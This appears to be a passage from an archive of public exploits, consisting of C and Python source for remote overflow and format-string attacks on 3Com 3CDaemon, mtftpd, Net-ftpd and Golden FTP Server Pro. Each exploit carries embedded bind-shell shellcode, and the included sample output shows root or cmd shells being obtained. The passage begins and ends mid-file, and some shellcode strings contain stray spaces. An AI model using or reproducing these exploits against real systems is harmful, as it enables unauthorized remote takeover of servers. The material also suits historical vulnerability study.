printf("[+] size of payload: %d\n",strlen(payload));
printf("[+] payload sent.\n");
return 0;
}
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}
void usage(char* us)
{
printf("USAGE:\n");
printf(" [+] . 101_3com.exe Target VulnIP (bind mode)\n");
printf(" [+] . 101_3com.exe Target VulnIP VulnPORT (bind mode)\n");
printf(" [+] . 101_3com.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode)\n");
printf("TARGET: \n");
printf(" [+] 1. Win2k SP4 Server English (*)\n");
printf(" [+] 1. Win2k SP4 Pro English (*)\n");
printf(" [+] 1. Win2k SP4 Server German (*)\n");
printf(" [+] 1. Win2k SP4 Pro China (*)\n");
printf(" [+] 1. Win2k SP4 Pro Dutch (*)\n");
printf(" [+] 1. Win2k SP4 Pro Norsk (*)\n");
printf(" [+] 2. WinXP SP2 Pro. English \n");
printf(" [+] 2. WinXP SP1a Pro. English (*)\n");
printf(" [+] 2. WinXP SP1 Pro. English \n");
printf("NOTE: \n");
printf(" The exploit bind a cmdshell port 101 or\n");
printf(" reverse a cmdshell on your listener.\n");
printf(" A wildcard (*) mean tested working, else, supposed working.\n");
printf(" Compilation msvc6, cygwin, Linux.\n");
return;
}
void ver()
{
printf(" \n");
printf(" ================================================== =[0.1]=====\n");
printf(" ================3COM 3CDaemon v2.0 Revision 10===============\n");
printf(" ==============FTP Service, Remote Stack Overflow=============\n");
printf(" ======coded by class101=============[Hat-Squad.com 2005]=====\n");
printf(" ================================================== ===========\n");
printf(" \n");
}
// [2005-02-18]
21 mtftpd <= 0.0.3 Remote Root Exploit
/*
\ mtftpd <= 0.0.3 remote root exploit
/ by darkeagle
\
/ discovered by darkeagle - xx.10.04
\
/ (c) unl0ck research team [http://unl0ck.org]
\
/ greetz: unl0ckerZ, rosielloZ, nosystemZ, etc..
\
/ [darkeagle@localhost darkeagle]$ ./0x666-ftpd -a 127.0.0.1 -p beautifulgirlz -u darkeagle
mtftpd <= 0.0.3 remote root exploit
by darkeagle [http://unl0ck.org]
[`] GOT: 0x804fcb0
[`] Retaddr: 0xbffff8d8
[`] Username: darkeagle
[`] Password: beautifulgirlz
[`] IP: 127.0.0.1
[`] Port: 21
[`] Creating SOCKET structure...
[+] Structure Done!
[`] Connecting... OK!
[+] Sending LOGIN DATA
[+] Successfully logged!
[`] Creating EviL Data... OK!
[`] Sending... OK!
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
id; uname -a;
uid=0(root) gid=0(root) groups=0(root)
Linux localhost 2.6.3-7mdk #1 Wed Mar 17 15:56:42 CET 2004 i686 unknown unknown GNU/Linux
: command not found
\
/
\ *--------------------------------------------*
/ mailto: darkeagle [at] linkin-park [dot] cc
\ darkeagle [at] unl0ck [dot] org
/ *-------------------------------------------*
\
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <getopt.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/fcntl.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define PORT 21
#define doit( b0, b1, b2, b3, addr ) { \
b0 = (addr >> 24) & 0xff; \
b1 = (addr >> 16) & 0xff; \
b2 = (addr >> 8) & 0xff; \
b3 = (addr ) & 0xff; \
}
#define GOT_ADDR 0x0804fcb0
#define RETADDR 0xbffff8d8
char shellcode[] = //binds 2003 port
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x 8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x 89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x 14\x66\xc7\x45\x16"
"\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x 0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\x cd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\x b0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x 68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
int usage ( char *proga )
{
printf("\n\nmtftpd <= 0.0.3 remote root exploit\n");
printf("by darkeagle\n");
printf("\nusage: %s <options>\n\nOptions:\n-a <ip_address>\n-p <password>\n-u <username>\n-g <gotaddr>\n-r <retaddr>\n\n", proga);
printf("EnJoY!\n\n");
exit(0);
}
char *
build_un( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
{
char * buf;
unsigned int length = 128;
unsigned char b0, b1, b2, b3;
int start = 256;
doit( b0, b1, b2, b3, retaddr );
if ( !(buf = (char *)malloc(length * sizeof(char))) ) {
fprintf( stderr, "Can't allocate buffer (%d)\n", length );
exit( -1 );
}
memset( buf, 0, length );
b3 -= figure;
b2 -= figure;
b1 -= figure;
b0 -= figure;
snprintf( buf, length,
"%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
b3 - (sizeof( size_t ) * 4) + start - base, offset,
b2 - b3 + start, offset + 1,
b1 - b2 + start, offset + 2,
b0 - b1 + start, offset + 3 );
return buf;
}
int
main( int argc, char * argv[] )
{
char opt;
char * fmt;
char * endian;
unsigned long locaddr, retaddr;
unsigned int offset, base, align = 0;
unsigned char b0, b1, b2, b3;
int length, ch;
char *username = NULL;
char *password = NULL, *ip = NULL;
char evil[3000];
int f_got = 0;
int f_retaddr = 0;
char databuf[300];
struct sockaddr_in final;
int Socket;
char exec[300];
char recva[200];
if ( argc < 6 ) { usage(argv[0]); }
printf("\n\nmtftpd <= 0.0.3 remote root exploit\n");
printf("by darkeagle [http://unl0ck.org]\n");
while ((opt = getopt(argc, argv,"p:u:a:g:r:")) != EOF) {
switch (opt) {
case 'p':
password = optarg;
break;
case 'a':
ip = optarg;
break;
case 'g':
f_got = strtoul(optarg,NULL,0);
break;
case 'r':
f_retaddr = strtoul(optarg,NULL,0);
break;
case 'u':
username = optarg;
break;
default:
usage(argv[0]);
break;
}
}
if ( f_got == 0 || f_retaddr == 0 )
{
f_got = GOT_ADDR;
f_retaddr = RETADDR;
}
printf("\n [`] GOT: 0x%x\n [`] Retaddr: 0x%x\n [`] Username: %s\n [`] Password: %s\n [`] IP: %s\n [`] Port: %d\n", f_got, f_retaddr, username, password, ip, 21);
printf(" [`] Creating SOCKET structure...\n");
final.sin_family = AF_INET;
final.sin_port = htons(PORT);
final.sin_addr.s_addr = inet_addr(ip);
Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
printf(" [+] Structure Done!\n");
printf(" [`] Connecting...\t");
if ( connect(Socket, (struct sockaddr*)&final, sizeof(final)) == -1 ) { printf("FAILED!\n"); exit(0); }
printf("OK!\n");
printf(" [+] Sending LOGIN DATA\n");
snprintf(databuf, 300, "USER %s\r\n\r\nPASS %s\r\n\r\n", username, password);
send(Socket, databuf, strlen(databuf), 0);
recv(Socket, recva, sizeof(recva), 0);
if ( strstr(recva, "230" ) ) { printf(" [+] Successfully logged!\n"); } else {
printf(" [-] Invalid login or password!\n\n");
exit(0); }
printf(" [`] Creating EviL Data...\t");
length = ( sizeof( size_t ) * 16 ) + 1;
if ( !(endian = (char *)malloc(length * sizeof(char))) ) {
fprintf( stderr, "Can't allocate buffer (%d)\n", length );
exit( -1 );
}
memset( endian, 0, length );
ch = 0;
locaddr = f_got; // syslog GOT
retaddr = f_retaddr; // return address to shellcode
offset = 12; // offset to 0x2e414141 - CWD AAAA%12$x
base = 4;
//locaddr += 0x4;
doit( b0, b1, b2, b3, locaddr );
if ( base%4 ) {
align = 4 - ( base%4 );
base += align;
}
strcat(endian, "U");
snprintf( endian+strlen(endian), length,
"%c%c%c%c"
"%c%c%c%c"
"%c%c%c%c"
"%c%c%c%c",
b3, b2, b1, b0,
b3 + 1, b2, b1, b0,
b3 + 2, b2, b1, b0,
b3 + 3, b2, b1, b0 );
fmt = build_un( retaddr, offset, base, 0xF + 0x1 );
memset(fmt+strlen(fmt), 0x42, 48);
strcat(fmt, shellcode);
sprintf(evil, "CWD %s\r\n\r\n", fmt);
if ( strlen(evil) >= 256 ) { printf("FAILED!\n"); exit(0); }
printf("OK!\n");
printf(" [`] Sending...\t");
send(Socket, evil, strlen(evil), 0);
printf("OK!\n");
sprintf(exec, "telnet %s 2003\n", ip);
printf(" [+] Connecting to shell...\t");
sleep(2);
system(exec);
printf("FAILED!\n\n");
return 0;
}
// [2005-03-29]
21 NetFTPd 4.2.2 User Authentication Remote Buffer Overflow Exploit
#
# Net-ftpd 4.2.2 user autentication b0f exploit (0day)
# coded by Sergio 'shadown' Alvarez
#
import struct
import socket
import sys
import time
class warftpd:
def __init__(self, host, port):
self.host = host
self.port = port
self.bsize = 512
self.ebpaddr = 0xcacacaca
self.retaddr = 0xdeadbeef
self.sctype = 'findskt'
self.scport = None
def setebpaddr(self, addr):
self.ebpaddr = addr
def setretaddr(self, addr):
self.retaddr = addr
def setbsize(self, size):
self.bsize = size
def setsctype(self, type):
self.sctype = type
def setscport(self, port):
self.scport = port
def genbuffer(self):
##
# Alpha port bind 4444, thanx metasploit
##
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49"
sc += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x 51\x5a\x6a\x46"
sc += "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x56\x42\x 32\x42\x41\x32"
sc += "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x 79\x6b\x4c\x70"
sc += "\x6a\x78\x6b\x70\x4f\x6d\x38\x59\x69\x49\x6f\x69\x 6f\x6b\x4f\x61"
sc += "\x70\x4c\x4b\x70\x6c\x35\x74\x66\x44\x6c\x4b\x73\x 75\x45\x6c\x4c"
sc += "\x4b\x31\x6c\x55\x55\x62\x58\x54\x41\x38\x6f\x6e\x 6b\x50\x4f\x57"
sc += "\x68\x4c\x4b\x33\x6f\x65\x70\x56\x61\x38\x6b\x69\x 73\x50\x30\x37"
sc += "\x39\x6c\x4b\x50\x34\x4e\x6b\x77\x71\x58\x6e\x34\x 71\x4b\x70\x4a"
sc += "\x39\x6e\x4c\x6b\x34\x4f\x30\x64\x34\x35\x57\x6b\x 71\x6b\x7a\x56"
sc += "\x6d\x53\x31\x78\x42\x7a\x4b\x69\x64\x35\x6b\x32\x 74\x61\x34\x76"
sc += "\x48\x44\x35\x4d\x33\x4c\x4b\x63\x6f\x56\x44\x37\x 71\x5a\x4b\x50"
sc += "\x66\x6e\x6b\x66\x6c\x32\x6b\x4c\x4b\x31\x4f\x45\x 4c\x75\x51\x38"
sc += "\x6b\x34\x43\x76\x4c\x4c\x4b\x6b\x39\x72\x4c\x45\x 74\x47\x6c\x63"
sc += "\x51\x7a\x63\x45\x61\x4f\x30\x53\x54\x4e\x6b\x67\x 30\x30\x30\x4c"
sc += "\x4b\x63\x70\x34\x4c\x4e\x6b\x34\x30\x37\x6c\x4e\x 4d\x4e\x6b\x71"
sc += "\x50\x55\x58\x61\x4e\x73\x58\x6e\x6e\x70\x4e\x64\x 4e\x68\x6c\x70"
sc += "\x50\x4b\x4f\x6b\x66\x30\x31\x49\x4b\x50\x66\x52\x 73\x53\x56\x30"
sc += "\x68\x74\x73\x57\x42\x43\x58\x61\x67\x61\x63\x75\x 62\x63\x6f\x36"
sc += "\x34\x49\x6f\x58\x50\x45\x38\x4a\x6b\x4a\x4d\x39\x 6c\x57\x4b\x56"
sc += "\x30\x69\x6f\x5a\x76\x43\x6f\x4d\x59\x78\x65\x35\x 36\x4c\x41\x48"
sc += "\x6d\x66\x68\x37\x72\x71\x45\x62\x4a\x64\x42\x6b\x 4f\x38\x50\x35"
sc += "\x38\x6e\x39\x64\x49\x7a\x55\x4c\x6d\x31\x47\x79\x 6f\x6e\x36\x56"
sc += "\x33\x62\x73\x72\x73\x30\x53\x71\x43\x77\x33\x30\x 53\x67\x33\x36"
sc += "\x33\x59\x6f\x7a\x70\x30\x66\x70\x68\x76\x71\x73\x 6c\x41\x76\x72"
sc += "\x73\x6f\x79\x7a\x41\x4c\x55\x32\x48\x4c\x64\x44\x 5a\x74\x30\x4a"
sc += "\x67\x56\x37\x49\x6f\x4a\x76\x51\x7a\x44\x50\x42\x 71\x53\x65\x6b"
sc += "\x4f\x38\x50\x30\x68\x6f\x54\x4e\x4d\x44\x6e\x79\x 79\x30\x57\x79"
sc += "\x6f\x68\x56\x41\x43\x30\x55\x4b\x4f\x4a\x70\x52\x 48\x4d\x35\x67"
sc += "\x39\x6f\x76\x30\x49\x33\x67\x6b\x4f\x4a\x76\x72\x 70\x63\x64\x61"
sc += "\x44\x30\x55\x49\x6f\x38\x50\x4c\x53\x65\x38\x4b\x 57\x72\x59\x6a"
sc += "\x66\x63\x49\x72\x77\x69\x6f\x78\x56\x41\x45\x4b\x 4f\x6a\x70\x70"
sc += "\x66\x70\x6a\x63\x54\x61\x76\x30\x68\x43\x53\x72\x 4d\x6c\x49\x68"
sc += "\x65\x53\x5a\x70\x50\x53\x69\x76\x49\x6a\x6c\x6f\x 79\x4d\x37\x61"
sc += "\x7a\x67\x34\x4e\x69\x59\x72\x37\x41\x6b\x70\x6a\x 53\x4c\x6a\x59"
sc += "\x6e\x53\x72\x56\x4d\x59\x6e\x33\x72\x64\x6c\x6c\x 53\x4e\x6d\x42"
sc += "\x5a\x35\x68\x4c\x6b\x6e\x4b\x4e\x4b\x72\x48\x44\x 32\x6b\x4e\x4d"
sc += "\x63\x54\x56\x79\x6f\x43\x45\x32\x64\x6b\x4f\x6b\x 66\x33\x6b\x53"
sc += "\x67\x30\x52\x63\x61\x66\x31\x52\x71\x53\x5a\x74\x 41\x56\x31\x32"
sc += "\x71\x73\x65\x50\x51\x4b\x4f\x5a\x70\x32\x48\x6c\x 6d\x4a\x79\x47"
sc += "\x75\x48\x4e\x62\x73\x6b\x4f\x7a\x76\x61\x7a\x6b\x 4f\x6b\x4f\x35"
sc += "\x67\x6b\x4f\x68\x50\x6e\x6b\x31\x47\x4b\x4c\x6d\x 53\x68\x44\x41"
sc += "\x74\x4b\x4f\x4e\x36\x36\x32\x49\x6f\x68\x50\x75\x 38\x6c\x30\x4f"
sc += "\x7a\x56\x64\x31\x4f\x43\x63\x59\x6f\x4a\x76\x4b\x 4f\x38\x50\x46"
# shellcode
#sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\xe0\x66"
#sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x 66\x4f\x97\xb6"
#sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x 67\xf6\x49\xaa"
#sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x 67\xf2\xf3\x1f"
#sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\x a1\xf7\x30\xdb"
#sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x 6a\x57\x49\xba"
#sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x 39\x42\x9f\xbb"
#sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x 6a\x97\x99\xfc"
#sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\x b0\x95\x05\x61"
#sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x 66\x1c\xc2\x70"
#sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x 2f\x9a\x8b\x44"
#sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x 8b\xe0\xf9\xb7"
#sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\x b1\x95\x1d\x69"
#sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x 99\x49\xc6\xb9"
#sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x 56\x2d\x02\xb0"
#sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x 57\xc7\x91\xb3"
#sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x 33\x38\x91\xb7"
#sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x 25\x51\x86\xe0"
#sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x 3f\xef\x69\x67"
#sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x 42\x20\xc3\xe1"
#sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\x eb\x58\xe6\xf0"
#sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x 99\x69\xc2\x88"
#sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x 13\x1c\xaa\x4d"
#sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x 99\xcf\x3d\x95"
#sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x 99\xcc\xc2"
# other stuff
nops = "\x41"*(self.bsize-len(sc)-50)
ebp = struct.pack('<L', self.ebpaddr)
# check if the value is an integer, otherwise it should be a string
if self.retaddr.__class__.__name__ == 'int':
ret = struct.pack('<L', self.retaddr)
else:
ret = self.retaddr
# assemble buffer to send
buffer = "USER "
buffer += nops
buffer += sc
buffer += '\x42'*(50-4)
buffer += ebp
buffer += ret
return buffer
def exploit(self):
# connect
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
skt.connect((self.host, self.port))
except socket.error, err:
print "[-] Error: %s" % err[1]
return None
print "[+] Connected to %s:%d" % (self.host, self.port)
# recv banner
print "[+] Receiving Banner"
res = skt.recv(100)
print res
# send payload
time.sleep(1)
print "[+] Sending payload"
skt.send(self.genbuffer())
time.sleep(2) # test on mcafee anti-b0f
skt.close()
# if successfull connect to the shell
time.sleep(2)
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
skt.connect((self.host, 4444))
except socket.error, err:
print "[-] Error: %s" % err[1]
print "[-] Explotation failed\n[-] Daemon should be dead..."
return None
print "[+] Connected to shell at %s on port %d" % (self.host, 4444)
res = skt.recv(1024)
if res:
if res.count('Microsoft Windows'):
print "[+] Welcome my lord, i'm here to serve you ;) ...\n"
from telnetlib import Telnet
telnet = Telnet()
telnet.sock = skt
try:
telnet.interact()
except:
pass
skt.close()
print "[-] Bye..bye I hope you've enjoyed your stay.. ;)"
return None
skt.close()
print '[-] Explotation failed\nDaemon should be dead...'
if __name__ == '__main__':
if len(sys.argv) != 3:
print "*************************************"
print "* Coded by Sergio 'shadown' Alvarez *"
print "* [email protected] *"
print "*************************************"
print "Usage: %s host port" % sys.argv[0]
sys.exit(1)
exp = warftpd(sys.argv[1], int(sys.argv[2]))
exp.setsctype('findskt')
exp.setscport(1234)
exp.setbsize(1014)
exp.setebpaddr(0xdeadbeef) # sometimes needed, just in case
exp.setretaddr('\x4c\xfa\x12\x00') # Universal Win2k SP0/SP1/SP2/SP3/SP4 (jmp to our input buffer)
exp.exploit()
# [2005-04-26]
21 Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit
/*
*
* Golden FTP Server Pro Remote Buffer Overflow Exploit
* Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: [email protected]
* Credit to kozan and metasploit
* Usage:exploit <targetOs> <targetIp>
*
*/
/*
*
* Vulnerable Versions:
* Golden FTP Server Pro v2.52
*
* Exploit:
* Run the exploit against the server. Afterward, right
* click on the Golden FTP Server Pro icon in the Windows tray and click
* Statistic.
* It will open bind shell on port 4444
*
*/
#include <windows.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
char userreq[] =
"USER "
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
char *target[]= //return addr
{
"\xFC\x18\xD7\x77", //WinXp Sp1 Eng - jmp esp addr
"\xBF\xAC\xDA\x77" //WinXp Sp2 Eng - jmp esp addr
};
char shellcode[] =
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=348 Encoder=PexFnstenvSub http://metasploit.com */
"\x31\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x82"
"\x2a\x64\x94\x83\xeb\xfc\xe2\xf4\x7e\x40\x8f\xdb\x 6a\xd3\x9b\x6b"
"\x7d\x4a\xef\xf8\xa6\x0e\xef\xd1\xbe\xa1\x18\x91\x fa\x2b\x8b\x1f"
"\xcd\x32\xef\xcb\xa2\x2b\x8f\x77\xb2\x63\xef\xa0\x 09\x2b\x8a\xa5"
"\x42\xb3\xc8\x10\x42\x5e\x63\x55\x48\x27\x65\x56\x 69\xde\x5f\xc0"
"\xa6\x02\x11\x77\x09\x75\x40\x95\x69\x4c\xef\x98\x c9\xa1\x3b\x88"
"\x83\xc1\x67\xb8\x09\xa3\x08\xb0\x9e\x4b\xa7\xa5\x 42\x4e\xef\xd4"
"\xb2\xa1\x24\x98\x09\x5a\x78\x39\x09\x6a\x6c\xca\x ea\xa4\x2a\x9a"
"\x6e\x7a\x9b\x42\xb3\xf1\x02\xc7\xe4\x42\x57\xa6\x ea\x5d\x17\xa6"
"\xdd\x7e\x9b\x44\xea\xe1\x89\x68\xb9\x7a\x9b\x42\x dd\xa3\x81\xf2"
"\x03\xc7\x6c\x96\xd7\x40\x66\x6b\x52\x42\xbd\x9d\x 77\x87\x33\x6b"
"\x54\x79\x37\xc7\xd1\x79\x27\xc7\xc1\x79\x9b\x44\x e4\x42\x75\xc8"
"\xe4\x79\xed\x75\x17\x42\xc0\x8e\xf2\xed\x33\x6b\x 54\x40\x74\xc5"
"\xd7\xd5\xb4\xfc\x26\x87\x4a\x7d\xd5\xd5\xb2\xc7\x d7\xd5\xb4\xfc"
"\x67\x63\xe2\xdd\xd5\xd5\xb2\xc4\xd6\x7e\x31\x6b\x 52\xb9\x0c\x73"
"\xfb\xec\x1d\xc3\x7d\xfc\x31\x6b\x52\x4c\x0e\xf0\x e4\x42\x07\xf9"
"\x0b\xcf\x0e\xc4\xdb\x03\xa8\x1d\x65\x40\x20\x1d\x 60\x1b\xa4\x67"
"\x28\xd4\x26\xb9\x7c\x68\x48\x07\x0f\x50\x5c\x3f\x 29\x81\x0c\xe6"
"\x7c\x99\x72\x6b\xf7\x6e\x9b\x42\xd9\x7d\x36\xc5\x d3\x7b\x0e\x95"
"\xd3\x7b\x31\xc5\x7d\xfa\x0c\x39\x5b\x2f\xaa\xc7\x 7d\xfc\x0e\x6b"
"\x7d\x1d\x9b\x44\x09\x7d\x98\x17\x46\x4e\x9b\x42\x d0\xd5\xb4\xfc"
"\x72\xa0\x60\xcb\xd1\xd5\xb2\x6b\x52\x2a\x64\x94";
char nops[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90";
char passreq[] =
"PASS \r\n";
void main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
SOCKET mysocket;
char rec[1024];
if (argc < 3)
{
printf("\r\nGolden FTP Server Pro Remote Buffer Overflow Exploit\r\n",argv[0]);
printf("Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)\r\n");
printf("Exploit coded By ATmaCA\r\n");
printf("Web: atmacasoft.com && spyinstructors.com\r\n");
printf("Credit to kozan and metasploit\r\n");
printf("Usage:\r\nexploit <targetOs> <targetIp>\r\n\r\n",argv[0]);
printf("Targets:\n");
printf("1 - WinXP SP1 english\n");
printf("2 - WinXP SP2 english\n");
printf("Example:exploit 2 127.0.0.1\n");
return;
}
int targetnum = atoi(argv[1]) - 1;
char *evilbuf = (char*)malloc(sizeof(userreq)+sizeof(shellcode)+si zeof(nops)
+sizeof(passreq)+7);
strcpy(evilbuf,userreq);
strcat(evilbuf,target[targetnum]);
strcat(evilbuf,nops);
strcat(evilbuf,shellcode);
strcat(evilbuf,"\r\n");
strcat(evilbuf,passreq);
//printf("%s",evilbuf);
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return;
mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET){
printf("Socket error!\r\n");
exit(1);
}
printf("Resolving Hostnames...\n");
if ((pTarget = gethostbyname(argv[2])) == NULL){
printf("Resolve of %s failed\n", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons(21);
printf("Connecting...\n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
printf("Couldn't connect to host.\n");
exit(1);
}
printf("Connected!...\n");
printf("Waiting for welcome message...\n");
Sleep(10);
recv(mysocket,rec,1024,0);
printf("Sending evil request...\n");
if (send(mysocket,evilbuf, strlen(evilbuf)+1, 0) == -1){
printf("Error Sending evil request.\r\n");
closesocket(mysocket);
exit(1);
}
Sleep(10);
printf("Success.\n");
closesocket(mysocket);
WSACleanup();
}
// [2005-04-29]
21 Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit (2nd)
/*
Golden FTP Server Pro remote stack BOF exploit
author : c0d3r "kaveh razavi" [email protected] [email protected]
risk : highly critical
vender status : no patch released , all targets are vuln
package : golden-ftp-server-pro 2.5.0.0 and prior
advisory : http://secunia.com/advisories/15156/
vender address : www.goldenftpserver.com
timeline :
28 Apr 2005 : Public Disclosure
29 Apr 2005 : IHS exploit released , winxpsp1 & winxpsp2 target
after running the exploit u need to restart the server after that
the server will be closed automatically then u will have a shell
on port 4444 . if u want to erase the crap just clean the GFTPpro.log
manually as mentioned in the advisory .
workaround : upgrade to newer version or use another FTP server .
compiled with visual c++ 6 : cl golden-ftp.c
greetz : IHSTeam members,exploit-dev mates,securiteam,str0ke-milw0rm
(C) IHS security 2005
*/
/*
D:\projects>golden-ftp 127.0.0.1 21 0
-------- Golden FTP Server Pro remote stack BOF exploit by c0d3r
[+] building overflow string
[+] attacking host 127.0.0.1
[+] packet size = 755 byte
[+] connected
[+] sending the overflow string
[+] exploit sent successfully !
[+] restart the Ftp server then nc 127.0.0.1 4444
D:\projects>nc -vv 127.0.0.1 4444
DNS fwd/rev mismatch: localhost != kaveh
localhost [127.0.0.1] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\Golden FTP Server Pro>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 755
// 5 byte user command + 332 byte NOP junk + 4 byte return address
// + 15 byte NOP + 399 byte shellcode
// using metasploit great shellcode LPORT=4444 Size=399
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x 85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x 84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x 84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x 42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x 89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\x da\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x 89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x 53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x 85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\x cc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x 68\xd3\xa3\x18"
